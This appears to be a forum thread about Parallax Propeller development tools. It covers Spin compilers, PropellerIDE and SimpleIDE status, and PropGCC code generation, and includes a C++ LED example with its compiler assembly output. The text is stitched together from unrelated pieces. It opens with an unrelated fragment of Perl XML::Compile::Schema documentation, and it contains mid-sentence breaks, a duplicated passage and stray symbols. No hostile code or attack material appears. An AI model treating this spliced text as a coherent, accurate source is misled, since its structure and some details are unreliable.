name "_". When passed to the writer, you may specify a single value (not the whole HASH) when no attributes are used. complexType and complexType/complexContent These containers not only have attributes, but also multiple values as content. The "complexContent" is used to create inheritance structures in the data-type definition. This does not affect the XML data package itself." constant . Repetative blocks Particle blocks come in four shapes: "sequence", "choice", "all", and "group" (an indirect block). This also affects "substitutionGroups". repetative sequence, choice, all In situations like this: <element name="example"> <complexType> <sequence> <element name="a" type="int" /> <sequence> <element name="b" type="int" /> </sequence> <element name="c" type="int" /> </sequence> </complexType> </element> (yes, schemas are verbose) the data structure is <example> <a>1</a> <b>2</b> <c>3</c> </example> the Perl representation is flattened, into example => { a => 1, b => 2, c => 3 } Ok, this is very simple. However, schemas can use repetition: <element name="example"> <complexType> <sequence> <element name="a" type="int" /> <sequence minOccurs="0" maxOccurs="unbounded"> <element name="b" type="int" /> </sequence> <element name="c" type="int" /> </sequence> </complexType> </element> The XML message may be: <example> <a>1</a> <b>2</b> <b>3</b> <b>4</b> <c>5</c> </example> Now, the perl representation needs to produce an array of the data in the repeated block. This array needs to have a name, because more of these blocks may appear together in a construct. The name of the block is derived from the type of block and the name of the first element in the block, regardless whether that element is present in the data or not. So, our example data is translated into (and vice versa) example => { a => 1 , seq_b => [ {b => 2}, {b => 3}, {b => 4} ] , c => 5 } The following label is used, based on the name of the first element (say "xyz") as defined in the schema (not in the actual message): seq_xyz sequence with maxOccurs > 1 cho_xyz choice with maxOccurs > 1 all_xyz all with maxOccurs > 1 When you have compile(key_rewrite) option PREFIXED, and you have explicitly assigned the prefix "xs" to the schema namespace (See compile(prefixes)), then those names will respectively be "seq_xs_xyz", "cho_xs_xyz", "all_xs_xyz". repetative groups [behavioral change in 0.93] In contrast to the normal partical blocks, as described above, do the groups have names. In this case, we do not need to take the name of the first element, but can use the group name. It will still have "gr_" appended, because groups can have the same name as an element or a type(!) Blocks within the group definition cannot be repeated. repetative substitutionGroups For substitutionGroups which are repeating, the name of the base element is used (the element which has attribute "<. We do need this array, because the order of the elements within the group may be important; we cannot group the elements based to the extended element's name. In an example substitutionGroup, the Perl representation will be something like this: base-element-name => [ { extension-name => $data1 } , { other-extension => $data2 } ] Each HASH has only one key.. Schema hooksYou can use hooks, for instance, to block processing parts of the message, to create work-arounds for schema bugs, or to extract more information during the process than done by default. Defining hooks->addHook(HOOKDATA | HOOK); local hooks are only used for one reader or writer. They are evaluated before the global hooks. my $reader = $schema->compile(READER => $type , hook => HOOK, hooks => [ HOOK, HOOK, ...]); General syntax Each hook has three kinds of parameters: - . selectors - - . processors - - . action ('READER' or 'WRITER', defaults to both) -): - . type - - . extends - - . id - - . path -".apsOften,. Private variables in objects); Typemap limitations. Handling xsi:type (version at least. The type is is long syntax "{$ns}$type". See XML::Compile::Util::unpack_type() With the writer, you have to provide such an "XSI_TYPE" value or the element's base type will be used (and no "xsi:type" attribute created). This will probably cause warnings about unused tags. The type can be provided in full (see XML::Compile::Util::pack_type()) or [1.31] prefixed. [1.25] then the value is not an ARRAY, but only the keyword "AUTO", the parser will try to auto-detect all types which are valid alternatives. This currently only works for non-builtin types. The auto-detection might be slow and (because many schemas are broken) not produce a complete list. When debugging is enabled (``use Log::Report mode => 3;'') you will see to which list this AUTO gets expanded. xsi_type => { $base_type => 'AUTO' } # requires X::C v1.25[improved with release 1.10] The standard practice is to use the localName of the XML elements as key in the Perl HASH; the key rewrite mechanism is used to change that, sometimes to separate. key_rewrite via table ); Rewrite via function] } ); key_rewrite when localNames collide. Rewrite for convenience! Pre-defined key_rewrite rules - UNDERSCORES - Replace dashes (-) with underscores (_). - SIMPLIFIED - Rewrite rule with the constant name (STRING) "SIMPLIFIED" will replace all dashes with underscores, translate capitals into lowercase, and remove all other characters which are none-bareword (if possible, I am too lazy to check) - PREFIXED - - PREFIXED(...) -. LICENSECopyrights 2006-2016 by [Mark Overmeer]. For other contributors see ChangeLog. This program is free software; you can redistribute it and/or modify it under the same terms as Perl itself. See
http://manpages.org/xmlcompileschema/3
CC-MAIN-2021-21
refinedweb
1,945
57.16
I Was Told to Not Make a CMS, So I Made a CMS Framework I Was Told to Not Make a CMS, So I Made a CMS Framework Faced with the same problem over and over, this dev sought to make his own software to fix the issue. Then he open sourced it! Join the DZone community and get the full member experience.Join For Free Google can be a cold place, sometimes. You see, I’m a freelancer and my main focuses are web, mobile, and desktop applications. Some of the most annoying job requests I get are small businesses with some sort of 'unique' business model. These business models vary and tools like WordPress, Joomla, or some sort of Headless CMS rarely ever cut it. Sometimes I needed it to expose an API, sometimes I needed really custom interactions, sometimes I wanted plugins that actually worked. The other solution is to build these content management systems from scratch. Making mundane CRUD screens that take up way too much of my time, with me ending up with yet another uninteresting project on my résumé. This is frustrating because I only freelance part-time (as I am also finishing up my CS degree). And because I essentially live as a student, these jobs are easy and can really help me out month-to-month, as I can find them pretty easily. These jobs suck, but they pay. So I took another approach. I Made Elepy, a Headless CMS Framework for Java I was so fed up with these basic CMS applications that I started to work towards a solution that could streamline the process of making a content management solution so much that I could make Content Management Systems in my sleep. After months of architecting, designing, implementing, and failing, I did it. I started pumping out websites and apps like it was nobody’s business. And as the requirements per project changed, the feature-set of the framework grew. For example, one client didn’t want MongoDB because he heard PostgreSQL was better, so I had to make it work with SQL. I had to make the framework as extendable, customizable, and replaceable as possible (to keep up with these weird requirements). But How Is it Different From Any Other Headless CMS? Well, I’m still programming, not drag-and-dropping. My code defines exactly what I want to do, without the boilerplate. All the layers (database access, business logic, and presentation) are effortlessly generated for you after you define what your domain is. And if you ever want to change any layer (or just a part of one) you can do so pretty easily. Here’s an example of the code for a basic product CMS: import com.elepy.annotations.*; import com.elepy.models.TextType; @RestModel(slug = "/products", name = "Name") public class Product { @Identifier private String id; @Number(minimum = 0) private BigDecimal price; @Unique @Searchable private String name; @DateTime(maximum } This is what gets generated for me: How it works now is that whenever I have to implement a custom feature that only applies to a specific business model, the framework literally gets out of the way and provides support for writing the custom functionality. Read more about that here:. I’m Happy With It! It was a success! My personal website, 15+ websites/apps for clients, the Elepy documentation (with GitHub integration), and part of my DevOps automation all run successfully on Elepy. Things that usually take a month now take around a day. I can now say that I focus much more on domain problems than wanting to slam my laptop into the ground because the WordPress plugin that I bought didn’t have a certain feature. And because it essentially pays for itself in development time, I decided to open source the framework and make it available to all the programmers who were once as frustrated as I was! Here it Is: - Please fork/contribute to/star the repository on GitHub: - Websites: and - A medium article of how to get started: Opinions expressed by DZone contributors are their own. {{ parent.title || parent.header.title}} {{ parent.tldr }} {{ parent.linkDescription }}{{ parent.urlSource.name }}
https://dzone.com/articles/i-was-told-to-not-make-a-cms-so-i-made-a-cms-frame?utm_medium=feed&utm_source=feedpress.me&utm_campaign=Feed%3A+dzone%2Fwebdev
CC-MAIN-2020-24
refinedweb
696
60.65
Matthew Musni610 Points It won't work. It Doesn't loop. What's wrong when i run the program it doesnt have errors but it doesnt perform its function. When i type quit it says "youve entered quit minutes". I dont get it. ''' using System; namespace teamtreehouse1 { class MainClass { public static void Main(string[] args) { int runningTotal = 0; bool keepGoing = true; while(keepGoing) { // Prompt the user for minutes exercised Console.Write("Enter how many times the user quits } } Console.WriteLine("Goodbye"); } } } ''' Jon Wood9,883 Points Yep, the code looks good to me! :) When experimenting I either fire up Rider (no longer free for long, I believe) or just going to .NET Fiddle. They have better language support in terms of letting you know of compile errors as you're typing and intellisense. 1 Answer Steven Parker179,649 Points You must have been using different code. The code above is not capable of the behavior you describe. Matthew Musni610 Points Matthew Musni610 Points ok guys i tried to create a new project in Xamarin studio then copied my code there and it worked! i don't why but it now works!
https://teamtreehouse.com/community/it-wont-work-it-doesnt-loop-whats-wrong
CC-MAIN-2020-05
refinedweb
190
75.61
Check out this quick tour to find the best demos and examples for you, and to see how the Felgo SDK can help you to develop your next app or game! Felgo allows you to access various device sensors, with the Qt Sensors QML Types. Here is an example how to read from the Accelerometer sensor. You can tilt your phone forward and backward to see the value changing along the Y-axis: import Felgo 3.0 import QtQuick 2.0 import QtSensors 5.9 App { NavigationStack { Page { title: "Hello Felgo" AppText { anchors.verticalCenter: parent.verticalCenter text: "Accelerometer Y " + accelerometer.reading.y } Accelerometer { id: accelerometer active: true } } } }
https://felgo.com/doc/apps-howto-use-native-device-sensors/
CC-MAIN-2020-40
refinedweb
107
60.31
Synchronous code will block the event loop and degrade the performance of the Quart application it is run in. This is because the synchronous code will block the task it is run in and in addition block the event loop. It is for this reason that synchronous code is best avoided, with asynchronous versions used in preference. It is likely though that you will need to use a third party library that is synchronous as there is no asynchronous version to use in its place. In this situation it is common to run the synchronous code in a thread pool executor so that it doesn’t block the event loop and hence degrade the performace of the Quart application. This can be a bit tricky to do, so Quart provides some helpers to do so. Firstly any synchronous route will be run in an executor, i.e. @app.route("/") def sync(): method = request.method ... will result in the sync function being run in a thread. Note that you are still within the Contexts, and hence you can still access the request, current_app and other globals. request current_app The following functionality accepts syncronous functions and will run them in a thread, Route handlers Endpoint handlers Error handlers Context processors Before request Before websocket Before first request Before serving After request After websocket After serving Teardown request Teardown websocket Teardown app context Open session Make null session Save session Whilst you can access the request and other globals in synchronous routes you will be unable to await coroutine functions. To work around this Quart provides run_sync() which can be used as so, run_sync() @app.route("/") async def sync_within(): data = await request.get_json() def sync_processor(): # does something with data ... result = await run_sync(sync_processor) return result this is similar to utilising the asyncio run_in_executor function, @app.route("/") async def sync_within(): data = await request.get_json() def sync_processor(): # does something with data ... result = await asyncio.get_running_loop().run_in_exector( None, sync_processor ) return result Note The run_in_executor function does not copy the current context, whereas the run_sync method does. It is for this reason that the latter is recommended. Without the copied context the request and other globals will not be accessible.
https://pgjones.gitlab.io/quart/how_to_guides/sync_code.html
CC-MAIN-2020-40
refinedweb
363
62.88
Win32 Under the hood:: Sequal to Lets pop the hood and see what makes Windows tick. While keeping things simple. At this point we will use the C language to look at examples, Its easyer to folow for beginers then a bunch of C++ classes. The requirements is that you have a C/C++ compiler, suports 32bit and check to see you have a windows.h inside your include folder. Grab a copy of win32.hlp file from Read this as your Bible to win32. Refer to this always, if you dont know what a function does, or what its parameters are or how to use it, look it up The first of your programs will always #include <windows.h>, this is what gives you access to the Win32API. Some compilers may require a linker option. #define WIN32_LEAN_AND_MEAN #include <windows.h> We define WIN32_LEAN_AND_MEAN because this will exclude extra headder files that windows.h would normaly include. As your first few Win32 programs will have no need for these extras. As your programs advance you will undoubtably need to remove the ofending line. As most would be familiar, main() is the entery point for a DOS or console application. Native Win32 apps begine executation at WinMain. In DOS we passed command line arguments, these argv I believe were arguments passed to main(). In case of Win32 Windows fills in the arguments to WinMain: int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int nShow); First we gasp at WINAPI, this is a calling convetion, basicaly has to do with memory, stack and how functions are called. This is the least of our wories. HINSTANCE and LPSTR may apear as new data types to you however they are just an alias for standard C types typedef char * LPSTR typedef void * HINSTANCE They get included by windows.h. hInst is a pointer or handle to our executable. hPrevInst is nolonger used, its left over from 16bit Windows. lpCmdLine is a command line, this is optional and ads functionality to your app. nShow indicates to your application the way your window is suposed to start out, minimized, maximized...When you create a shortcut on your desktop, this is controlled in properties. Windows takes care of filling in these parameters. So now we need to do something with this knowledge. Well lets start with a easy to use and understand function MessageBox. int WINAPI WinMain(HINSTANCE hInst, HINSTANCE hPrevInst, LPSTR lpCmdLine, int nShow){ MessageBox(NULL, "This is a message box!", "Title", MB_OK); return 0; } The first argument, is suposed to be a handle to our parent window but we dont have one. Next a pointer to a null terminated string containing our message text, and another containing the title. MB_OK says we want an ok button in our message box. MB_OK is define as a macro inside winuser.h included by windows.h #define MB_OK 0x00000000L If you compile, and you get not compiler or linker errors you should see a nice message box. } Hardly "Under the hood" though is it? More like "Where to put the petrol in" Slarty very true, always have dificulties generating titles. Gona lay off the Win32 tuts for a while don't want to get caryed away. Thanks BTW for helping to fill in more on the portablility of Win32 in Linux for me in the other tut. Forum Rules
http://www.antionline.com/showthread.php?244804-Win32-Under-the-hood
CC-MAIN-2016-50
refinedweb
562
74.49
Section (1) unshare Name unshare — run program with some namespaces unshared from parent Synopsis unshare [options] [ program [arguments] ] DESCRIPTION Unshares the indicated namespaces from the parent process and then executes the specified program. If program is not given, then ``${SHELL}_zsingle_quotesz__zsingle_quotesz_infoor findmnt -o+PROPAGATION for the shared flags). For further details, see mount_namespaces(7) and the discussion of the CLONE_NEWNSflag in clone(2). unshare since util-linux version 2.27 automatically sets propagation to private in a new mount namespace to make sure that the new namespace is really unshared. It_zsingle_quotesz_s possible to disable this feature with option −−propagation unchanged. Note that private is the kernel default. - UTS namespace Setting hostname or domainname will not affect the rest of the system. For further details, see namespaces(7) and the discussion of the CLONE_NEWUTSflag in clone(2). - IPC namespace The process will have an independent namespace for POSIX message queues as well as System V message queues, semaphore sets and shared memory segments. For further details, see namespaces(7) and the discussion of the CLONE_NEWIPCflag in clone(2). - network namespace The process will have independent IPv4 and IPv6 stacks, IP routing tables, firewall rules, the /proc/netand /sys/class/netdirectory trees, sockets, etc. For further details, see namespaces(7) and the discussion of the CLONE_NEWNETflag in clone(2). - PID namespace Children will have a distinct set of PID-to-process mappings from their parent. For further details, see pid_namespaces(7) and the discussion of the CLONE_NEWPIDflagflag in clone(2). - user namespace The process will have a distinct set of UIDs, GIDs and capabilities. For further details, see user_namespaces(7) and the discussion of the CLONE_NEWUSERflag in clone(2). OPTIONS −i, −−ipc[= file] Unshare the IPC namespace. If file is specified, then a persistent namespace is created by a bind mount. −m, −−mount[=. −n, −−net[= file] Unshare the network namespace. If file is specified, then a persistent namespace is created by a bind mount. −p, −−pid[= file] Unshare the PID namespace. If file is specified then persistent namespace is created by a bind mount. See also the −−forkand −−mount−procoptions. −u, −−uts[= file] Unshare the UTS namespace. If file is specified, then a persistent namespace is created by a bind mount. −U, −−user[= file] Unshare the user namespace. If file is specified, then a persistent namespace is created by a bind mount. −C, −−cgroup[= file] Unshare the cgroup namespace. If file is specified then persistent namespace is created by bind mount. −f, −−fork Fork the specified programas a child process of unshare rather than running it directly. This is useful when creating a new PID namespace. −−kill−child[= signame] When unshare terminates, have signame be sent to the forked child process. Combined with −−pidthis allows for an easy and reliable killing of the entire process tree below unshare. If not given, signame defaults to SIGKILL. This option implies −−fork. −−mount−proc[=). −r, −−map−root−user −−setgroups=deny. −−propagation private|shared|slave|unchanged Recursively set the mount propagation flag in the new mount namespace. The default is to set the propagation to private. It is possible to disable this feature with the argument unchanged. The option is silently ignored when the mount namespace ( −−mount) is not requested. −−setfPfB/gid_map) has been set. The GID map is writable by root when setgroups(2) is enabled (i.e. allow, the default), and the GID map becomes writable by unprivileged processes when setgroups(2) is permanently disabled (with deny). −V, −−version Display version information and exit. −h, −−help_zsingle_quotesz Section (2) unshare Name unshare — disassociate parts of the process execution context Synopsis #define _GNU_SOURCE #include <sched.h>flag. Unshare the file descriptor table, so that the calling process no longer shares its file descriptors with any other process. CLONE_FS Reverse the effect of the clone(2) CLONE_FSflag.flag. Unshare the cgroup namespace. Use of CLONE_NEWCGROUPrequires the CAP_SYS_ADMINcapability. CLONE_NEWIPC(since Linux 2.6.19) This flag has the same effect as the clone(2) CLONE_NEWIPCflag. Unshare the IPC namespace, so that the calling process has a private copy of the IPC namespace which is not shared with any other process. Specifying this flag automatically implies CLONE_SYSVSEMas well. Use of CLONE_NEWIPCrequires the CAP_SYS_ADMINcapability. CLONE_NEWNET(since Linux 2.6.24) This flag has the same effect as the clone(2) CLONE_NEWNETflag. Unshare the network namespace, so that the calling process is moved into a new network namespace which is not shared with any previously existing process. Use of CLONE_NEWNETrequires the CAP_SYS_ADMINcapability. CLONE_NEWNS This flag has the same effect as the clone(2) CLONE_NEWNSflag. Unshare the mount namespace, so that the calling process has a private copy of its namespace which is not shared with any other process. Specifying this flag automatically implies CLONE_FSas well. Use of CLONE_NEWNSrequires the CAP_SYS_ADMINcapability. For further information, see mount_namespaces(7). CLONE_NEWPID(since Linux 3.8) This flag has the same effect as the clone(2) CLONE_NEWPIDflag. Unshare the PID namespace, so that the calling process has a new PID namespace for its children which is not shared with any previously existing process. The calling process is notmoved into the new namespace. The first child created by the calling process will have the process ID 1 and will assume the role of init(1) in the new namespace. CLONE_NEWPIDautomatically implies CLONE_THREADas well. Use of CLONE_NEWPIDrequires the CAP_SYS_ADMINcapability. For further information, see pid_namespaces(7). CLONE_NEWUSER(since Linux 3.8) This flag has the same effect as the clone(2) CLONE_NEWUSERflag. Unshare the user namespace, so that the calling process is moved into a new user namespace which is not shared with any previously existing process. As with the child process created by clone(2) with the CLONE_NEWUSERflag, the caller obtains a full set of capabilities in the new namespace. CLONE_NEWUSERrequires that the calling process is not threaded; specifying CLONE_NEWUSERautomatically implies CLONE_THREAD. Since Linux 3.9, CLONE_NEWUSERalso automatically implies CLONE_FS. CLONE_NEWUSERrequiresflag. Unshare the UTS IPC namespace, so that the calling process has a private copy of the UTS namespace which is not shared with any other process. Use of CLONE_NEWUTSrequires the CAP_SYS_ADMINcapability. CLONE_SYSVSEM(since Linux 2.6.26) This flag reverses the effect of the clone(2) CLONE_SYSVSEMflag. Unshare System V semaphore adjustment ( semadj) values, so that the calling process has a new empty semadjlist that is not shared with any other process. If this is the last process that has a reference to the process_zsingle_quotesz_s current semadjlist,_zsingle_quotesz_s execution context. RETURN VALUE On success, zero returned. On failure, −1 is returned and errno is set to indicate the error. ERRORS - EINVAL An invalid bit was specified in flags. - EINVAL CLONE_THREAD, CLONE_SIGHAND, or CLONE_VMwas specified in flags, and the caller is multithreaded. - EINVAL CLONE_NEWIPCwas specified in flags, but the kernel was not configured with the CONFIG_SYSVIPCand CONFIG_IPC_NSoptions. - EINVAL CLONE_NEWNETwas specified in flags, but the kernel was not configured with the CONFIG_NET_NSoption. - EINVAL CLONE_NEWPIDwas specified in flags, but the kernel was not configured with the CONFIG_PID_NSoption. - EINVAL CLONE_NEWUSERwas specified in flags, but the kernel was not configured with the CONFIG_USER_NSoption. - EINVAL CLONE_NEWUTSwas specified in flags, but the kernel was not configured with the CONFIG_UTS_NSoption. - EINVAL CLONE_NEWPIDwas specified in flags, but the process has previously called unshare() with the CLONE_NEWPIDflag. - ENOMEM Cannot allocate sufficient memory to copy parts of caller_zsingle_quotesz_s context that need to be unshared. - ENOSPC (since Linux 3.7) CLONE_NEWPIDwas specified in flags, but the limit on the nesting depth of PID namespaces would have been exceeded; see pid_namespaces(7). - ENOSPC (since Linux 4.9; beforehand EUSERS) CLONE_NEWUSERwas flagsspecified the creation of a new user namespace, but doing so would have caused the limit defined by the corresponding file in /proc/sys/userto be exceeded. For further details, see namespaces(7). - EPERM The calling process did not have the required privileges for this operation. - EPERM CLONE_NEWUSERwas specified in flags, but either the effective user ID or the effective group ID of the caller does not have a mapping in the parent namespace (see user_namespaces(7)). - EPERM (since Linux 3.9) CLONE_NEWUSERwas specified in flagsand the caller is in a chroot environment (i.e., the caller_zsingle_quotesz_s root directory does not match the root directory of the mount namespace in which it resides). - EUSERS (from Linux 3.11 to Linux 4.8) CLONE_NEWUSERwas specified in flags, and the limit on the number of nested user namespaces would be exceeded. See the discussion of the ENOSPC error above._zsingle_quotesz−handling function: print an error message based on the value in _zsingle_quotesz_errno_zsingle_quotesz_ and terminate the calling process */ #define errExit(msg) do { perror(msg); exit(EXIT_FAILURE); } while (0) static void usage(char *pname) { fprintf(stderr, Usage: %s [options] program [arg...] , pname); fprintf(stderr, Options can be: ); fprintf(stderr, −i unshare IPC namespace ); fprintf(stderr, −m unshare mount namespace ); fprintf(stderr, −n unshare network namespace ); fprintf(stderr, −p unshare PID namespace ); fprintf(stderr, −u unshare UTS namespace ); fprintf(stderr, −U unshare user namespace ); exit(EXIT_FAILURE); } int main(int argc, char *argv[]) { int flags, opt; flags = 0; while ((opt = getopt(argc, argv, imnpuU)) != −1) { switch (opt) { case _zsingle_quotesz_i_zsingle_quotesz_: flags |= CLONE_NEWIPC; break; case _zsingle_quotesz_m_zsingle_quotesz_: flags |= CLONE_NEWNS; break; case _zsingle_quotesz_n_zsingle_quotesz_: flags |= CLONE_NEWNET; break; case _zsingle_quotesz_p_zsingle_quotesz_: flags |= CLONE_NEWPID; break; case _zsingle_quotesz_u_zsingle_quotesz_: flags |= CLONE_NEWUTS; break; case _zsingle_quotesz_U_zsingle_quotesz_: flags |= CLONE_NEWUSER; break; default: usage(argv[0]); } } if (optind >= argc) usage(argv[0]); if (unshare(flags) == −1))
https://manpages.net/detail.php?name=unshare
CC-MAIN-2022-21
refinedweb
1,535
58.58
Welcome to the Parallax Discussion Forums, sign-up to participate. Edit: Version 0.16 @" (absolute hub address) operator corrected object ordering bug Edit: Version 0.17 @ disables duplicate object elimination jac_goudsmit wrote: » PropellerIDE is sort of a portable version of Propeller Tool but needs work, probably dormant, not dead (will hopefully get project files and C/C++ support added) iseries wrote: » I have been writing code for the propeller for several years now and only code in C or C++. I only use SimpleIDE. #include <PropWare/PropWare.h> #include <PropWare/gpio/pin.h> using PropWare::Pin; using PropWare::Port; int main () { const Pin led1(Port::P17, Pin::Dir::OUT); led1.start_hardware_pwm(4); // This is in Hertz const Pin led2(Port::P16, Pin::Dir::OUT); while (1) { led2.toggle(); waitcnt(CLKFREQ / 4 + CNT); } } .section .text.startup.main,"ax",@progbits .balign 4 .global _main _main mov __TMP0,#(2<<4)+14 call #__LMM_PUSHM mov r7, DIRA mvi r6,#131072 or r7, r6 mvi r14,#__clkfreq mov DIRA, r7 mov r0, #0 mov r1, #4 mov r3, #0 mov CTRA, #0 rdlong r2, r14 lcall #___udivdi3 mov FRQA, r0 mov PHSA, #0 mvi r7,#.LC0 mvi r6,#-65537 rdlong CTRA, r7 mov r7, DIRA and r7, r6 mvi r6,#65536 or r7, r6 mov DIRA, r7 jmp #__LMM_FCACHE_LOAD long .L4-.L3 .L3 .L2 xor OUTA,r6 mov r5, CNT rdlong r7, r14 shr r7, #2 add r7, r5 waitcnt r7,#0 jmp #__LMM_FCACHE_START+(.L2-.L3) jmp __LMM_RET .compress default .L4 .data .balign 4 .LC0 long 268435456 .section .text.startup.main DavidZemon wrote: » mov r7, DIRA mvi r6,#131072 or r7, r6 ' compiler goes "squirrel!": mvi r14,#__clkfreq mov DIRA, r7 mov r7, DIRA mvi r6,#131072 or r7, r6 ' compiler goes "squirrel!": mvi r14,#__clkfreq mov DIRA, r7 or DIRA, mask ... mask long |< hw#pin_LED void set_dir (const PropWare::Port::Dir direction) const { DIRA = (DIRA & ~(this->m_mask)) | (this->m_mask & static_cast<uint32_t>(direction)); } Heater. wrote: » In some situations changing the pin direction rapidly can be important. It could be being used in a bidirectional fashion. jac_goudsmit wrote: » Heater. wrote: » In some situations changing the pin direction rapidly can be important. It could be being used in a bidirectional fashion. David Betz wrote: » Ah, you must be talking about your L-Star Plus board. I'm just starting to assemble mine today. Very nice work! iseries wrote: » I don't follow. C code is faster than SPIN code and if you don't like the C code you write Assemble code. What's not to like here. @. It does conditional compiles. Roy looks after OpenSpin. Hope this helps. Prop OS (also see Sphinx, PropDos, PropCmd, Spinix) Website: Prop Tools (Index) , Emulators (Index) , ZiCog (Z80) Probably have some more changes in the near future. ...and there is Homespun: @ in an open sourced Spin compiler. Works a treat on Linux. I have never tried building it on a Windows machine. @ or whatever features the Propeller Tool does not have. I pretty much gave up following SimpleIDE and PropellerIDE ages ago. They were so neglected and in disarray. Perhaps that has changed recently. ===Jac @. @. The unused method/object elimination is more aggressive than BSTCs in most cases. @ = absolute byte address in HUB. The issue is that it has to work in context. As in, as part of of an expression. Since you don't know the final location of a label in hub memory until after everything is compiled and linked together into the final binary, you then need to go back and fix up already compiled code with new data. That could possibly change the end result compiled size, which could move the address of the thing in hub memory. The way Chip's compiler does things is not a typical parser/compiler setup. It's parsing and compiling as it goes. The passes aren't even clearly separate, since the 1st pass ends up being done twice for every file that includes other files (OBJs). It's all very different from how BSTC or Homespun or any of the others do it. My questions? ===Jac SimpleIDE is for students, PropellerIDE is for pros? SimpleIDE is for C/C++, PropellerIDE is for Spin and PBasic. Whether or not SimpleIDE can do Spin is rather irrelevant I think - it was never intended to be an IDE/editor for Spin-focused projects and therefore isn't very good at it. Pick the right tool for the job, and SimpleIDE isn't the right tool for a Spin-focused project. You might then follow this up with "so C/C++ is for students and Spin is for pros?" at which point I would vehemently say "NO" and point you to any number of language war threads that already exist on this forum, and someone else would undoubtedly reply with why C/C++ is a terrible fit and you should stick with Spin, and of course Peter would quickly follow up saying we're all dumb for not just using Tachyon. And he'd probably be right. What's the future of SimpleIDE/PropellerIDE? I don't think either is "dead" in the sense that they have no users and fail to run on moderns systems... but certainliy neither has seen any updates in quite a while. PropellerIDE was forked from SimpleIDE and (after the fork) written almost entirely by another forum member named Brett. Though I believe Parallax contracted him for some of the work, much of it was volunteer and he's since had to find other, full-time work. Long story short, no one here is aware of any plans to make any changes to PropellerIDE for the foreseeable future. If Parallax has any such plans, they haven't announced them. No forum member has stepped up to take Brett's place, except for one person who has been making a few tweaks. Time will tell whether or not he continues his improvements and accepts the responsibility of maintainer or prefers keep his footprint small. SimpleIDE... oh there's a story there too. Parallax seems to be far more vested in that due to their push in the education market and the fact that they are pushing C, not Spin, in education. That being said, we've seen only the most minimal in changes in SimpleIDE for the last few years. The key author, jazzed, did all the work under contract (I think??? i've never actually talked to him about that so i could be totally off base there), so the fact that we haven't seen any changes means Parallax cut off the money supply. We won't see any further work until Parallax deems it worthy/necessary. And just like PropellerIDE, I don't think there has been any public mention of future plans. What's up with renamed libraries in PropellerIDE? I think that was Brett trying to refactor the libraries for better organization. It is indeed a breaking change, but I personally like the result a lot more. I hope you do too, after some adjustment period. Compatibility of PASM/BSTC/OpenSpin? PASM issues in gas? gas is only available from PropGCC, none of the Spin compilers. On the other hand, (new versions of) PropGCC know how to compile PASM as well as gas. On the other hand, PropGCC uses a different binary output format. Basically... either write your code in Spin and pick any number of the Spin compilers (Parallax Propeller Tool, openspin, homespun, bstc, who knows what else) or write your code in C/C++ with PropGCC. There are ways to mix Spin and C/C++ too, but I don't think that's what you're asking about here. Ignore PASM from a requirements standpoint - both the spin compilers and PropGCC will build your assembly code just fine. IF you're on Linux and IF you like the command line and IF you like PropGCC, then we should chat about PropWare - I happen to think it's just dandy for that niche case.: 1. SimpleIDE is for C more than anything, and PropellerIDE is for Spin and PropBasic. At least those are my understanding of the target usages. 2. I think active development on both of them is on hold or stopped. 3. PropellerIDE is meant to be an alternative to PropTool, it's differences are mainly additional features. I don't really know specifics since I do not use it. 4. No one is working on BSTC and it's closed source, no one is actively working on Homespun that I know of either. I will continue to support OpenSpin until the Prop dies or I die (whichever comes first). 5. I had not seen your issue submitted at the OpenSpin github, sorry about that. It doesn't seem to be emailing me notifications again. I replied over there, but your bug is not an OpenSpin one, it's a PropellerIDE one. OpenSpin does already search the current path for files before going to look in the passed in paths (the lib path is passed in). 6. I believe the "renamed" libraries in PropellerIDE are stuff to go with Lamestation? That was Brett's motivation for making/working on PropellerIDE. Again, I don't use it so I don't know the details. 7. OpenSpin, BSTC and the other spin compilers should all be the same for Spin and PASM source code. Only the "gas" variant is different syntax, etc. for PASM. I'm also no aware of any cross language support being in any of the compilers. If you want to use PASM stuff with propgcc then you have to do the same stuff you've always had to do over there. OpenSpin and BSTC do have a compile option for making a binary file of the DAT stuff, which can then be used with propgcc somehow. Forgot about it to mention in my previous reply. from bottom up... @ and gas. The syntax and usage of GAS is different and direct copy of PASM is not there. Thus the trick using binary blobs. PropellerIde is made by Brent for his own Game-Development System and he renamed the Libraries to fit his purpose. This is not a Parallax Product. It does Spin/Pasm, but not C/C++. SimpleIde is made by @Jazzed with some support from Parallax and mainly made for C development. Spin support was added later as well as support for Basic. This is somehow a Parallax Product, but mainly for C and Blockly. I never had that Library issue, I mainly use the PropTool and there the current directory is searched first, then the library folder. Should be the same for openSpin, worked for me fine. BST is also not a Parallax Project, as far as I remember Brad stopped working on it because of no support/interest from Parallax to work on it. Consider it dead. Same goes for Homespun, no further development as far as I know. Consider it dead. PropellerIDE is made by Brent, now back at a fulltime job. He will/may do some more but no timeframe. Consider it as not dead yet, but on hold. SimpleIDE is under developmet at Parallax, mainly used for Blockly and will be supported, but development somehow stopped while waiting for the P2. OpenSpin is made by Roy but for Parallax, this is somehow a Parallax Product and actively supported by Roy. It will also grow into the P2 Spin compiler as Roy stated. SimpleIDE is mainly for C (thus the project files) PropellerIDE is opensource and both run on Windows Linux and some macs. PropTool is Windows only and has not been changed for a while now. My personal feeling here is that @Ken is busy getting Blockly into the education market to finance @Chips P2, all Parallax developer are working on Blockly and everything else like PropGCC, SimpleIDE, new PropTool or whatever else are on hold until the P2 is done and in production. Then there will be a furious action to get the Software tools done to have something when the chips finally arrive.. ===Jac It is the only C++ way to handle the p1 I heard of, and @DavidZemon does a really great job doing so. He also runs a build-server providing actual binaries for propGCC and more. He is a great and dedicated guy, pushing along for a couple of years now. He has probably the most current sources for most of the tools needed to use C/C++ on a propeller in his builds.. @ and is only a partial solution. There are other forum folks that have also made some interesting changes to the PropellerIDE sources. Perhaps we should open up an experimental/development branch of PropellerIDE on GitHub with these changes and have forum folks test on the variety of systems? This, only on Parallax's approval! dgately Works great and gets the job done. I am able to build libraries and functions with no issues. I find most of the time Assembly code is not necessary as the C code generates the same code and works just fine. Look at hacking the parallax badge in c code which is all in C code. Mike Thanks! I haven't looked at the C/C++ compilers for a while. But I remember a few years ago, the C compiler wasn't smart enough to generate assembly code that would work for me. The biggest problem was that the generated code would "juggle" values between "registers" unnecessarily because the compiler is based on the assumption that registers are more efficient than memory, whereas on the Propeller registers ARE memory. So if you would want to do something like a bitwise OR operation on the OUTA register, it would copy the value from OUTA to one of the pseudo-registers, perform the operation and then copy the pseudo-register back to OUTA. (I'm doing this from memory so this may not be a valid or true example but you get the gist. The more complicated the expression, the more juggling it would do). My code 